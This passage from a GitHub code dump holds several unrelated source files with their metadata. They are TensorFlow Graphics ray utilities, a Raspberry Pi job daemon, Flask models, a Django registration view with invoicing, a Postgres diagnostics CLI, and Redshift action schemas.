    a tensor of shape `[A1, ..., An, N, 3]` representing the ray direction.
  """
  shape.check_static(tensor=rays,
                     tensor_name="pixels",
                     has_rank_greater_than=1)
  shape.compare_batch_dimensions(
      tensors=(rays, rotation_matrix, translation_vector),
      tensor_names=("points_on_rays", "rotation_matrix", "translation_vector"),
      last_axes=-3,
      broadcast_compatible=False)
  # Origins: the camera center, i.e. zero points moved by the extrinsics.
  rays_org = _move_in_front_of_camera(tf.zeros_like(rays),
                                      rotation_matrix,
                                      translation_vector)
  # Directions: apply the rotation only (translation zeroed out) ...
  rays_dir_ = _move_in_front_of_camera(rays,
                                       rotation_matrix,
                                       0 * translation_vector)
  # ... then normalize to unit length.
  rays_dir = rays_dir_/tf.norm(rays_dir_, axis=-1, keepdims=True)
  return rays_org, rays_dir
def camera_rays_from_transformation_matrix(rays, transform_matrix):
  """Estimate ray origin and direction from transformation matrix.

  Args:
    rays: A tensor of shape `[A1, ..., An, N, 3]` where N is the number of rays.
    transform_matrix: A tensor of shape `[A1, ..., An, 4, 4]`.

  Returns:
    A tensor of shape `[A1, ..., An, N, 3]` representing the ray origin and
    a tensor of shape `[A1, ..., An, N, 3]` representing the ray direction.
  """
  # The origin is the translation column of the 4x4 transform, broadcast to
  # one copy per ray.
  rays_o = transform_matrix[..., :3, -1]  # [A1, ..., An, 3]
  rays_o = tf.expand_dims(rays_o, -2)  # [A1, ..., An, 1, 3]
  rays_o = tf.broadcast_to(rays_o, tf.shape(rays))  # [A1, ..., An, N, 3]
  # Rotate each direction by the 3x3 rotation block: the row-wise products
  # summed over the last axis are equivalent to rays @ rot^T.
  rot = transform_matrix[..., tf.newaxis, :3, :3]
  rays_d = tf.reduce_sum(tf.expand_dims(rays, axis=-2) * rot, axis=-1)
  return rays_o, rays_d
def l2_loss(prediction, target, weights=1.0):
  """Weighted mean squared error; prediction and target shapes must match."""
  assert prediction.shape == target.shape, "Shape dims should be the same."
  squared_error = tf.square(target - prediction)
  return tf.reduce_mean(weights * squared_error)
def l2_loss_distrib(prediction, target, global_batch_size, weights=1.0):
  """Weighted squared-error sum scaled by the global batch size, for use
  under a distribution strategy; shapes must match."""
  assert prediction.shape == target.shape, "Shape dims should be the same."
  total = tf.reduce_sum(weights * tf.square(target - prediction))
  return total * (1. / global_batch_size)
| {
"content_hash": "4b79828311b7b917ffcbbe858d5ebda4",
"timestamp": "",
"source": "github",
"line_count": 207,
"max_line_length": 124,
"avg_line_length": 38.16425120772947,
"alnum_prop": 0.6237974683544304,
"repo_name": "tensorflow/graphics",
"id": "1246b28f057def07c324acbcee538d4973affde9",
"size": "8486",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow_graphics/projects/radiance_fields/utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "2403"
},
{
"name": "C++",
"bytes": "115377"
},
{
"name": "Cython",
"bytes": "12955"
},
{
"name": "JavaScript",
"bytes": "22252"
},
{
"name": "Jupyter Notebook",
"bytes": "246839"
},
{
"name": "Python",
"bytes": "2222139"
},
{
"name": "Shell",
"bytes": "4281"
},
{
"name": "Starlark",
"bytes": "2233"
}
],
"symlink_target": ""
} |
"""pidaemon.py
Usage:
pidaemon.py [--brightness=<b>] [--sleep=<s>] [--interval=<s>] [--wait=<s>]
pidaemon.py (-h | --help)
pidaemon.py --version
Options:
-h --help Show this screen.
--version Show version
--brightness=<b> Default brightness level 1-255 [default: 2]
--interval=<s> Default interval in seconds between each frame in jobs [default: 0.1]
--sleep=<s> Default number of seconds to pause after each job [default: 0]
--wait=<s> Time between each iteration when polling for job on an empty queue. [default: 5]
"""
import sys
import signal
import time
from docopt import docopt
from collections import defaultdict
import settings
from piqueue import piqueue
class PiDaemon():
    """Daemon that polls a persistent job queue and runs each job in turn."""

    def __init__(self, opts):
        self.running = None
        self.options = self.parse_options(opts)
        self.session = piqueue.Session()
        self.setup_signal_handlers()

    def parse_options(self, opts):
        """Convert docopt string options to numbers; unknown keys read as None."""
        parsed = {
            'brightness': int(opts['--brightness']),
            'sleep': float(opts['--sleep']),
            'interval': float(opts['--interval']),
            'wait': float(opts['--wait']),
        }
        return defaultdict(lambda: None, parsed)

    def run(self):
        """Main loop: run queued jobs forever, polling while the queue is empty."""
        while True:
            job = self.next_job()
            if job is None:
                time.sleep(self.options['wait'])
                continue
            self.run_job(job)
            # Re-enqueue repeating jobs before removing the finished row.
            if job.options['keep'] == True:
                self.add_job(job)
            self.delete_job(job)

    def run_job(self, job):
        """Instantiate and execute one job; track it so cleanup can reach it."""
        worker = job.job_instance(self.options.copy())
        self.running = worker
        worker.run()
        worker.sleep()
        worker.cleanup()
        self.running = None

    def queue(self):
        """Query for all jobs, oldest first."""
        return self.session.query(piqueue.Job).order_by(piqueue.Job.date_created)

    def next_job(self):
        """Return the oldest queued job, or None when the queue is empty."""
        return self.queue().first()

    def add_job(self, old_job):
        """Persist a fresh copy of *old_job* at the back of the queue."""
        clone = piqueue.Job(old_job.job_name, old_job.options)
        self.session.add(clone)
        self.session.commit()

    def delete_job(self, job):
        """Remove *job* from the queue."""
        self.session.delete(job)
        self.session.commit()

    def setup_signal_handlers(self):
        """Route SIGINT/SIGTERM to cleanup so the current job can tidy up."""
        for signum in (signal.SIGINT, signal.SIGTERM):
            signal.signal(signum, self.cleanup)

    def cleanup(self, signum, frame):
        """Signal handler: clean up the in-flight job, then exit."""
        if self.running is not None:
            self.running.cleanup()
        sys.exit(-1)
if __name__ == '__main__':
    # The module docstring above is the docopt usage specification.
    opts = docopt(__doc__, version='PiDaemon v1.0')
    PiDaemon(opts).run()
| {
"content_hash": "6634f30c6b1f4dfeab1507f4011a7e00",
"timestamp": "",
"source": "github",
"line_count": 88,
"max_line_length": 100,
"avg_line_length": 29.181818181818183,
"alnum_prop": 0.5852803738317757,
"repo_name": "ollej/piapi",
"id": "9a713ff09ee505899d214450c2a3c4d64e7f9702",
"size": "2568",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pidaemon.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "27673"
},
{
"name": "Shell",
"bytes": "296"
}
],
"symlink_target": ""
} |
from app import db
class clients(db.Model):
    """Client record (SQLAlchemy model)."""
    # Primary key.
    idclients = db.Column(db.Integer, primary_key=True)
    # First / last name, both indexed for lookups.
    fname = db.Column(db.String(45), index=True)
    lname = db.Column(db.String(45), index=True)
    # Phone number stored as a string of up to 10 characters.
    phone = db.Column(db.String(10))
    # Date of birth.
    dob = db.Column(db.Date, index=True)
    def __repr__(self):
        return '<clients %r>' % (self.lname)
class ifa(db.Model):
    """IFA record with a description, a due date, and a client reference."""
    # Primary key.
    idifa = db.Column(db.Integer, primary_key=True)
    description = db.Column(db.String(450))
    duedate = db.Column(db.Date)
    # NOTE(review): the FK target 'user.id' looks suspect -- no user table is
    # defined in this module (clients.idclients seems intended). Confirm the
    # actual schema before changing it; left as-is to avoid a migration.
    clients_idclients = db.Column(db.Integer, db.ForeignKey('user.id'))
    def __repr__(self):
        # Bug fix: previously referenced self.nickname, which does not exist
        # on this model and raised AttributeError whenever repr() was taken.
        return '<ifa %r>' % (self.description)
class deleted_ifa(db.Model):
    """SQLAlchemy model archiving IFA items that were deleted."""
    id = db.Column(db.Integer, primary_key=True)
    description = db.Column(db.String(450))
    duedate = db.Column(db.Date)
    # NOTE(review): same suspect FK target as ifa ('user.id' vs the visible
    # 'clients' table) -- confirm before changing; needs a migration.
    clients_idclients = db.Column(db.Integer, db.ForeignKey('user.id'))
    def __repr__(self):
        # Bug fix: previously returned '<User %r>' % (self.nickname), but this
        # model has no 'nickname' attribute, so repr() raised AttributeError.
        return '<deleted_ifa %r>' % (self.description)
| {
"content_hash": "817c94c2e3627fd52bfaf17ba6f18c0d",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 68,
"avg_line_length": 29.322580645161292,
"alnum_prop": 0.658965896589659,
"repo_name": "nickster5001/ctracker",
"id": "cab1f190be9de9a1f66d714bd5eb8cf5429708dd",
"size": "909",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "6349"
},
{
"name": "CSS",
"bytes": "11536"
},
{
"name": "HTML",
"bytes": "25137"
},
{
"name": "JavaScript",
"bytes": "22141"
},
{
"name": "Python",
"bytes": "10917902"
},
{
"name": "Shell",
"bytes": "3666"
}
],
"symlink_target": ""
} |
import datetime
from typing import List
from django.db import transaction
from quickbooks.exceptions import QuickbooksException
from rest_framework import generics, response, status
from rest_framework.authentication import SessionAuthentication
from rest_framework.exceptions import PermissionDenied
from huxley.api.serializers import CreateUserSerializer, RegistrationSerializer
from huxley.core.constants import PaymentTypes
from huxley.core.models import Conference
from huxley.invoice_automation.src import handler
from huxley.invoice_automation.src.model.address import Address
from huxley.invoice_automation.src.model.conference import Conference as invoiceConference
from huxley.invoice_automation.src.model.payment_method import PaymentMethod
from huxley.invoice_automation.src.model.school import School as invoiceSchool
from huxley.invoice_automation.src.model.registration import Registration as invoiceRegistration
from huxley.logging.models import LogEntry
class Register(generics.GenericAPIView):
    """Create a user (with school) plus a conference registration in one POST,
    optionally triggering QuickBooks invoicing afterwards."""
    authentication_classes = (SessionAuthentication, )
    # Serializers for the two top-level payload keys, 'user' and 'registration'.
    serializer_classes = {
        'user': CreateUserSerializer,
        'registration': RegistrationSerializer
    }
    def post(self, request, *args, **kwargs):
        # POST delegates straight to create().
        return self.create(request, *args, **kwargs)
    def create(self, request, *args, **kwargs):
        # Registration is only allowed while the current conference is open.
        if Conference.get_current().open_reg:
            return self.register(request, *args, **kwargs)
        raise PermissionDenied('Conference registration is closed.')
    def register(self, request, *args, **kwargs):
        """Validate and persist user + registration atomically; then, when
        invoicing is enabled, build invoice objects and send them."""
        user_data = request.data['user']
        registration_data = request.data['registration']
        with transaction.atomic():
            user_serializer = self.serializer_classes['user'](data=user_data)
            user_is_valid = user_serializer.is_valid()
            if not user_is_valid:
                # Also validate the registration so the 400 response carries
                # the combined error set from both serializers.
                registration_serializer = self.serializer_classes[
                    'registration'](data=registration_data)
                registration_serializer.is_valid()
                errors = registration_serializer.errors
                errors.update(user_serializer.errors)
                return response.Response(
                    errors, status=status.HTTP_400_BAD_REQUEST)
            user_serializer.save()
            # Saving the user creates the school; link the registration to it.
            school_id = user_serializer.data['school']['id']
            registration_data['school'] = school_id
            registration_serializer = self.serializer_classes['registration'](
                data=registration_data)
            registration_serializer.is_valid(raise_exception=True)
            registration_serializer.save()
        # Invoicing happens outside the transaction: a QuickBooks failure must
        # not roll back the already-saved user/registration.
        if Conference.get_current().invoicing_enabled and handler is not None:
            school_data = user_data['school']
            address = Address(
                line1=school_data['address'],
                line2='',
                city=school_data['city'],
                country_sub_division_code=school_data['state'],
                country=school_data['country'],
                zip_code=school_data['zip_code']
            )
            # Total delegates across all three experience levels.
            num_delegates = sum(
                map(
                    int,
                    [
                        registration_data['num_beginner_delegates'],
                        registration_data['num_intermediate_delegates'],
                        registration_data['num_advanced_delegates']
                    ]
                )
            )
            if int(registration_data['payment_type']) == PaymentTypes.CARD:
                payment_method = PaymentMethod.Card
            else:
                payment_method = PaymentMethod.Check
            invoices_sent = call_invoice_handler(
                school_name=school_data['name'],
                email=school_data['primary_email'],
                phone_numbers=[school_data['primary_phone'], school_data['secondary_phone']],
                address=address,
                num_delegates=num_delegates,
                payment_method=payment_method
            )
            if invoices_sent:
                # Record on the registration that invoicing succeeded.
                reg_object = registration_serializer.instance
                reg_object.invoices_sent = True
                reg_object.save()
        data = {'user': user_serializer.data,
                'registration': registration_serializer.data}
        return response.Response(data, status=status.HTTP_200_OK)
def call_invoice_handler(school_name: str,
                         email: str,
                         phone_numbers: List[str],
                         address: Address,
                         num_delegates: int,
                         payment_method: PaymentMethod) -> bool:
    """Build invoice-automation objects and hand the registration to QuickBooks.

    :param school_name: display name of the school being invoiced
    :param email: primary contact email
    :param phone_numbers: contact phone numbers for the school
    :param address: mailing address of the school
    :param num_delegates: total delegate count across all levels
    :param payment_method: how the school intends to pay
    :return bool: whether the invoices were successfully sent and created or not
    """
    invoice_school = invoiceSchool(school_name, email, phone_numbers, address)
    invoice_registration = invoiceRegistration(
        school=invoice_school,
        num_delegates=num_delegates,
        conference=invoiceConference.BMUN,
        registration_date=datetime.date.today(),
        payment_method=payment_method
    )
    try:
        handler.handle_registration(invoice_registration)
    except QuickbooksException as exc:
        # Record the QuickBooks failure so it is visible in the admin log.
        LogEntry(
            level="ERROR",
            message=exc.message,
            timestamp=datetime.datetime.now(),
            uri="/api/register",
            status_code=500,
            username=""
        ).save()
        return False
    return True
| {
"content_hash": "c3404b93184f3daf4e98589a16ad81a5",
"timestamp": "",
"source": "github",
"line_count": 145,
"max_line_length": 96,
"avg_line_length": 38.675862068965515,
"alnum_prop": 0.6135877318116976,
"repo_name": "bmun/huxley",
"id": "cfde1adbf5001c596019d8fa8a4c537cb0472c71",
"size": "5756",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "huxley/api/views/register.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "13301"
},
{
"name": "JavaScript",
"bytes": "400597"
},
{
"name": "Less",
"bytes": "19215"
},
{
"name": "Python",
"bytes": "635783"
},
{
"name": "Shell",
"bytes": "2475"
}
],
"symlink_target": ""
} |
import EMUtils
import SrcUtils | {
"content_hash": "fd18112f11292c843d88711b911d7096",
"timestamp": "",
"source": "github",
"line_count": 2,
"max_line_length": 15,
"avg_line_length": 15,
"alnum_prop": 0.9,
"repo_name": "simpeg/simpegem",
"id": "6e430cf90793bea8aebc3152c92d93bd3b71c609",
"size": "76",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "simpegEM/Utils/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "562675"
},
{
"name": "Python",
"bytes": "163227"
}
],
"symlink_target": ""
} |
import psycopg2
import click
import getpass
from tabulate import tabulate
def print_results(cursor):
    """Pretty-print a query result set as a psql-style table.

    Column values longer than 75 characters are truncated with a '..'
    suffix so wide rows stay readable.
    """
    headers = [column.name for column in cursor.description]

    def truncate_column(column):
        column = str(column)
        # Bug fix: the original sliced at 90 chars while triggering at >75,
        # which made 76-92 char values *longer* after "truncation".
        return (column[:75] + '..') if len(column) > 75 else column

    def truncate_row(row):
        return [truncate_column(column) for column in row]

    click.echo(tabulate(map(truncate_row, cursor), headers=headers, tablefmt="psql"))
def pg_stat_statement_available(cursor):
    """Return True when the pg_stat_statements extension is installed in the
    public schema of the connected database."""
    probe = """
    SELECT exists(
      SELECT 1 FROM pg_extension e LEFT JOIN pg_namespace n ON n.oid = e.extnamespace
      WHERE e.extname='pg_stat_statements' AND n.nspname = 'public'
    ) AS available
    """
    cursor.execute(probe)
    first_row = cursor.fetchone()
    return first_row[0]
def database_command(fn):
    """Wrap *fn* as a click command that runs against the configured database.

    The decorated function receives an open cursor and may return a cursor
    (or other iterable of rows) to be pretty-printed via print_results.
    ctx.obj carries the database URL set by the top-level cli() group.
    """
    @click.command(fn.__name__)
    @click.pass_context
    def wrapper(ctx):
        connection = psycopg2.connect(ctx.obj)
        try:
            cursor = connection.cursor()
            try:
                results = fn(cursor)
                if results:
                    print_results(results)
            finally:
                # Bug fix: the cursor and connection previously leaked when
                # the command raised (e.g. a SQL error); always close both.
                cursor.close()
        finally:
            connection.close()
    return wrapper
@database_command
def index_sizes(cursor):
    """List every user index with its on-disk size, largest first."""
    cursor.execute("""
    SELECT c.relname AS name,
      pg_size_pretty(sum(c.relpages::bigint*8192)::bigint) AS size
    FROM pg_class c
    LEFT JOIN pg_namespace n ON (n.oid = c.relnamespace)
    WHERE n.nspname NOT IN ('pg_catalog', 'information_schema')
    AND n.nspname !~ '^pg_toast'
    AND c.relkind = 'i'
    GROUP BY c.relname
    ORDER BY sum(c.relpages) DESC;
    """)
    return cursor
@database_command
def bloat(cursor):
    """Estimate table and index bloat (dead space) and the bytes wasted,
    using the standard pg_stats-based approximation."""
    sql = """
    WITH constants AS (
      SELECT current_setting('block_size')::numeric AS bs, 23 AS hdr, 4 AS ma
    ), bloat_info AS (
      SELECT ma,bs,schemaname,tablename,
        (datawidth+(hdr+ma-(case when hdr%ma=0 THEN ma ELSE hdr%ma END)))::numeric AS datahdr,
        (maxfracsum*(nullhdr+ma-(case when nullhdr%ma=0 THEN ma ELSE nullhdr%ma END))) AS nullhdr2
      FROM (
        SELECT schemaname, tablename, hdr, ma, bs,
          SUM((1-null_frac)*avg_width) AS datawidth,
          MAX(null_frac) AS maxfracsum,
          hdr+(
            SELECT 1+count(*)/8 FROM pg_stats s2
            WHERE null_frac<>0 AND s2.schemaname = s.schemaname AND s2.tablename = s.tablename
          ) AS nullhdr
        FROM pg_stats s, constants
        GROUP BY 1,2,3,4,5
      ) AS foo
    ), table_bloat AS (
      SELECT schemaname, tablename, cc.relpages, bs,
        CEIL((cc.reltuples*((datahdr+ma-
          (CASE WHEN datahdr%ma=0 THEN ma ELSE datahdr%ma END))+nullhdr2+4))/(bs-20::float)) AS otta
      FROM bloat_info
      JOIN pg_class cc ON cc.relname = bloat_info.tablename
      JOIN pg_namespace nn ON cc.relnamespace = nn.oid AND nn.nspname = bloat_info.schemaname AND nn.nspname <> 'information_schema'
    ), index_bloat AS (
      SELECT schemaname, tablename, bs,
        COALESCE(c2.relname,'?') AS iname, COALESCE(c2.reltuples,0) AS ituples, COALESCE(c2.relpages,0) AS ipages,
        COALESCE(CEIL((c2.reltuples*(datahdr-12))/(bs-20::float)),0) AS iotta -- very rough approximation, assumes all cols
      FROM bloat_info
      JOIN pg_class cc ON cc.relname = bloat_info.tablename
      JOIN pg_namespace nn ON cc.relnamespace = nn.oid AND nn.nspname = bloat_info.schemaname AND nn.nspname <> 'information_schema'
      JOIN pg_index i ON indrelid = cc.oid
      JOIN pg_class c2 ON c2.oid = i.indexrelid
    ) SELECT
      type, schemaname, object_name, bloat, pg_size_pretty(raw_waste) as waste
    FROM
    (
      SELECT 'table' as type, schemaname, tablename as object_name,
        ROUND(CASE WHEN otta=0 THEN 0.0 ELSE table_bloat.relpages/otta::numeric END,1) AS bloat,
        CASE WHEN relpages < otta THEN '0' ELSE (bs*(table_bloat.relpages-otta)::bigint)::bigint END AS raw_waste
      FROM table_bloat
        UNION SELECT 'index' as type, schemaname, tablename || '::' || iname as object_name,
        ROUND(CASE WHEN iotta=0 OR ipages=0 THEN 0.0 ELSE ipages/iotta::numeric END,1) AS bloat,
        CASE WHEN ipages < iotta THEN '0' ELSE (bs*(ipages-iotta))::bigint END AS raw_waste
      FROM index_bloat
    ) bloat_summary
    ORDER BY raw_waste DESC, bloat DESC
    """
    cursor.execute(sql)
    return cursor
@database_command
def blocking(cursor):
    """Show statements waiting on ungranted locks, paired with the statement
    holding the conflicting lock."""
    sql = """
    SELECT bl.pid AS blocked_pid,
      ka.query AS blocking_statement,
      now() - ka.query_start AS blocking_duration,
      kl.pid AS blocking_pid,
      a.query AS blocked_statement,
      now() - a.query_start AS blocked_duration
    FROM pg_catalog.pg_locks bl
    JOIN pg_catalog.pg_stat_activity a ON bl.pid = a.pid
    JOIN pg_catalog.pg_locks kl
      JOIN pg_catalog.pg_stat_activity ka ON kl.pid = ka.pid
      ON bl.transactionid = kl.transactionid AND bl.pid != kl.pid
    WHERE NOT bl.granted
    """
    cursor.execute(sql)
    return cursor
@database_command
def cache_hit(cursor):
    """Report index and table buffer-cache hit ratios."""
    cursor.execute("""
    SELECT 'index hit rate' AS name,
      (sum(idx_blks_hit)) / nullif(sum(idx_blks_hit + idx_blks_read),0) AS ratio
    FROM pg_statio_user_indexes
    UNION ALL
    SELECT 'table hit rate' AS name,
      sum(heap_blks_hit) / nullif(sum(heap_blks_hit) + sum(heap_blks_read),0) AS ratio
    FROM pg_statio_user_tables
    """)
    return cursor
@database_command
def calls(cursor):
    """Show the 10 most frequently called statements (needs pg_stat_statements)."""
    if pg_stat_statement_available(cursor):
        sql = """
        SELECT query AS qry,
          interval '1 millisecond' * total_time AS exec_time,
          to_char((total_time/sum(total_time) OVER()) * 100, 'FM90D0') || '%' AS prop_exec_time,
          to_char(calls, 'FM999G999G990') AS ncalls,
          interval '1 millisecond' * (blk_read_time + blk_write_time) AS sync_io_time
        FROM pg_stat_statements WHERE userid = (SELECT usesysid FROM pg_user WHERE usename = current_user LIMIT 1)
        ORDER BY calls DESC LIMIT 10
        """
        cursor.execute(sql)
        return cursor
    else:
        # Returning None makes database_command skip result printing.
        click.echo("pg_stat_statements extension need to be installed in the public schema first.")
        click.echo("This extension is only available on Postgres versions 9.2 or greater. You can install it by running:")
        click.echo("\n\tCREATE EXTENSION pg_stat_statements;\n\n")
@database_command
def index_usage(cursor):
    """Per table, show what percentage of scans used an index."""
    cursor.execute("""
    SELECT relname,
      CASE idx_scan
        WHEN 0 THEN 'Insufficient data'
        ELSE (100 * idx_scan / (seq_scan + idx_scan))::text
      END percent_of_times_index_used
    FROM pg_stat_user_tables
    ORDER BY percent_of_times_index_used ASC
    """)
    return cursor
@database_command
def locks(cursor):
    """Show queries holding ExclusiveLock, with the relation and lock age."""
    sql = """
    SELECT pg_stat_activity.pid, pg_class.relname, pg_locks.transactionid,
      pg_locks.granted, pg_stat_activity.query AS query_snippet,
      age(now(),pg_stat_activity.query_start) AS "age"
    FROM pg_stat_activity,pg_locks
    LEFT OUTER JOIN pg_class ON (pg_locks.relation = pg_class.oid)
    WHERE pg_stat_activity.query <> '<insufficient privilege>'
      AND pg_locks.pid = pg_stat_activity.pid
      AND pg_locks.mode = 'ExclusiveLock'
      AND pg_stat_activity.pid <> pg_backend_pid() order by query_start
    """
    cursor.execute(sql)
    return cursor
@database_command
def long_running_queries(cursor):
    """List non-idle queries that have been running for over five minutes."""
    cursor.execute("""
    SELECT
      pid, now() - pg_stat_activity.query_start AS duration, query
    FROM
      pg_stat_activity
    WHERE pg_stat_activity.query <> ''::text
      AND state <> 'idle'
      AND now() - pg_stat_activity.query_start > interval '5 minutes'
    ORDER BY now() - pg_stat_activity.query_start DESC
    """)
    return cursor
@database_command
def outliers(cursor):
    """Show the 10 statements with the highest total execution time
    (needs pg_stat_statements)."""
    if pg_stat_statement_available(cursor):
        sql = """
        SELECT interval '1 millisecond' * total_time AS total_exec_time,
          to_char((total_time/sum(total_time) OVER()) * 100, 'FM90D0') || '%' AS prop_exec_time,
          to_char(calls, 'FM999G999G999G990') AS ncalls,
          interval '1 millisecond' * (blk_read_time + blk_write_time) AS sync_io_time, query
        FROM pg_stat_statements
        WHERE userid = (SELECT usesysid FROM pg_user WHERE usename = current_user LIMIT 1)
        ORDER BY total_time DESC LIMIT 10
        """
        cursor.execute(sql)
        return cursor
    else:
        # Returning None makes database_command skip result printing.
        click.echo("pg_stat_statements extension need to be installed in the public schema first.")
        click.echo("This extension is only available on Postgres versions 9.2 or greater. You can install it by running:")
        click.echo("\n\tCREATE EXTENSION pg_stat_statements;\n\n")
@database_command
def ps(cursor):
    """Show active backends: pid, state, source application and query."""
    cursor.execute("""
    SELECT pid, state, application_name AS source,
      age(now(),xact_start) AS running_for, waiting, query
    FROM pg_stat_activity
    WHERE query <> '<insufficient privilege>' AND state <> 'idle'
      AND pid <> pg_backend_pid()
    ORDER BY query_start DESC
    """)
    return cursor
@database_command
def records_rank(cursor):
    """Rank user tables by estimated live row count."""
    cursor.execute("""
    SELECT relname AS name, n_live_tup AS estimated_count
    FROM pg_stat_user_tables
    ORDER BY n_live_tup DESC
    """)
    return cursor
@database_command
def seq_scans(cursor):
    """Rank user tables by sequential scan count."""
    cursor.execute("""
    SELECT relname AS name, seq_scan as count
    FROM pg_stat_user_tables
    ORDER BY seq_scan DESC
    """)
    return cursor
@database_command
def table_size(cursor):
    """List user tables by table size (excluding indexes), largest first."""
    cursor.execute("""
    SELECT c.relname AS name,
      pg_size_pretty(pg_table_size(c.oid)) AS size
    FROM pg_class c
    LEFT JOIN pg_namespace n ON (n.oid = c.relnamespace)
    WHERE n.nspname NOT IN ('pg_catalog', 'information_schema')
    AND n.nspname !~ '^pg_toast'
    AND c.relkind='r'
    ORDER BY pg_table_size(c.oid) DESC
    """)
    return cursor
@database_command
def total_table_size(cursor):
    """List user tables by total relation size (including indexes), largest first."""
    cursor.execute("""
    SELECT c.relname AS name,
      pg_size_pretty(pg_total_relation_size(c.oid)) AS size
    FROM pg_class c
    LEFT JOIN pg_namespace n ON (n.oid = c.relnamespace)
    WHERE n.nspname NOT IN ('pg_catalog', 'information_schema')
    AND n.nspname !~ '^pg_toast'
    AND c.relkind='r'
    ORDER BY pg_total_relation_size(c.oid) DESC
    """)
    return cursor
@database_command
def unused_indexes(cursor):
    """Find non-unique indexes that are rarely scanned, worst offenders first."""
    cursor.execute("""
    SELECT schemaname || '.' || relname AS table, indexrelname AS index,
      pg_size_pretty(pg_relation_size(i.indexrelid)) AS index_size,
      idx_scan as index_scans
    FROM pg_stat_user_indexes ui
    JOIN pg_index i ON ui.indexrelid = i.indexrelid
    WHERE NOT indisunique AND idx_scan < 50 AND pg_relation_size(relid) > 5 * 8192
    ORDER BY
      pg_relation_size(i.indexrelid) / nullif(idx_scan, 0) DESC NULLS FIRST,
      pg_relation_size(i.indexrelid) DESC
    """)
    return cursor
@click.group()
@click.pass_context
@click.argument('database_url')
def cli(ctx, database_url):
    """CLI entry point: stash the database URL on the click context so each
    database_command subcommand can connect to it."""
    ctx.obj = database_url
# Register every diagnostic subcommand on the CLI group.
for _command in (index_sizes, bloat, blocking, cache_hit, calls, index_usage,
                 locks, long_running_queries, outliers, ps, records_rank,
                 seq_scans, table_size, total_table_size, unused_indexes):
    cli.add_command(_command)
| {
"content_hash": "12a7b04df3fe6160e3d2ad2de643ae0d",
"timestamp": "",
"source": "github",
"line_count": 359,
"max_line_length": 132,
"avg_line_length": 31.30640668523677,
"alnum_prop": 0.6630483139069312,
"repo_name": "nata79/pgh",
"id": "15be1fb5f6ec36d44974335b72631119e0438de8",
"size": "11239",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pgh.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "11836"
}
],
"symlink_target": ""
} |
import logging
from dart.model.action import ActionType
_logger = logging.getLogger(__name__)
class RedshiftActionTypes(object):
    """Catalog of ActionType definitions understood by the Redshift engine.

    Each ActionType pairs a machine name and description with a JSON schema
    ('params_json_schema') describing the action's parameters; the schemas
    drive validation and form generation (note the 'x-schema-form' hints).
    """
    # Create the cluster, optionally restoring from a snapshot.
    start_datastore = ActionType(
        name='start_datastore',
        description='create or restore this Redshift cluster',
        params_json_schema={
            'type': 'object',
            'properties': {
                'snapshot_name': {
                    'type': ['string', 'null'],
                    'default': None,
                    'description': 'the cluster will be restored from this snapshot, or else the latest if one exists'
                                   ' (otherwise, a new cluster will be created)'
                },
            },
            'additionalProperties': False,
        },
    )
    # Shut the cluster down after taking a final snapshot.
    stop_datastore = ActionType(
        name='stop_datastore',
        description='Stops this Redshift cluster and creates a final snapshot',
    )
    # On-demand snapshot with a timestamped name.
    create_snapshot = ActionType(
        name='create_snapshot',
        description='create a snapshot of this cluster in the form "dart-datastore-<id>-<YYYYmmddHHMMSS>"',
    )
    # Run arbitrary user-supplied SQL against the cluster.
    execute_sql = ActionType(
        name='execute_sql',
        description='Executes a user defined SQL script',
        params_json_schema={
            'type': 'object',
            'properties': {
                'sql_script': {
                    'type': 'string',
                    'x-schema-form': {'type': 'textarea'},
                    'description': 'The SQL script to be executed'
                },
            },
            'additionalProperties': False,
            'required': ['sql_script'],
        },
    )
    # Load a dataset from s3 into the cluster.
    load_dataset = ActionType(
        name='load_dataset',
        description='Copies the dataset from s3 to the datastore',
        params_json_schema={
            'type': 'object',
            'properties': {
                'dataset_id': {'type': 'string', 'description': 'The id of the dataset to load'},
                's3_path_start_prefix_inclusive_date_offset_in_seconds': {'type': ['integer', 'null'], 'default': 0, 'description': 'If specified, the date used in s3 path substitutions will be adjusted by this amount'},
                's3_path_start_prefix_inclusive': {
                    'type': ['string', 'null'],
                    'default': None,
                    'pattern': '^s3://.+$',
                    'description': 'The inclusive s3 path start prefix. The following values (with braces) will be '
                                   'substituted with the appropriate zero-padded values at runtime: {YEAR}, {MONTH}, '
                                   '{DAY}, {HOUR}, {MINUTE}, {SECOND}',
                },
                's3_path_end_prefix_exclusive_date_offset_in_seconds': {'type': ['integer', 'null'], 'default': 0, 'description': 'If specified, the date used in s3 path substitutions will be adjusted by this amount'},
                's3_path_end_prefix_exclusive': {
                    'type': ['string', 'null'],
                    'default': None,
                    'pattern': '^s3://.+$',
                    'description': 'The exclusive s3 path end prefix. The following values (with braces) will be '
                                   'substituted with the appropriate zero-padded values at runtime: {YEAR}, {MONTH}, '
                                   '{DAY}, {HOUR}, {MINUTE}, {SECOND}',
                },
                's3_path_regex_filter_date_offset_in_seconds': {'type': ['integer', 'null'], 'default': 0, 'description': 'If specified, the date used in s3 path substitutions will be adjusted by this amount'},
                's3_path_regex_filter': {
                    'type': ['string', 'null'],
                    'default': None,
                    'description': 'A regex pattern the s3 path must match. The following values (with braces) will be '
                                   'substituted with the appropriate zero-padded values at runtime: {YEAR}, {MONTH}, '
                                   '{DAY}, {HOUR}, {MINUTE}, {SECOND}',
                },
                'target_schema_name': {'type': ['string', 'null'], 'default': 'public', 'pattern': '^[a-zA-Z0-9_]+$', 'description': 'created if absent'},
                'target_table_name': {'type': ['string', 'null'], 'default': None, 'pattern': '^[a-zA-Z0-9_]+$', 'description': 'overrides dataset setting'},
                'target_sort_keys': {
                    'type': 'array',
                    'default': [],
                    'maxItems': 400,
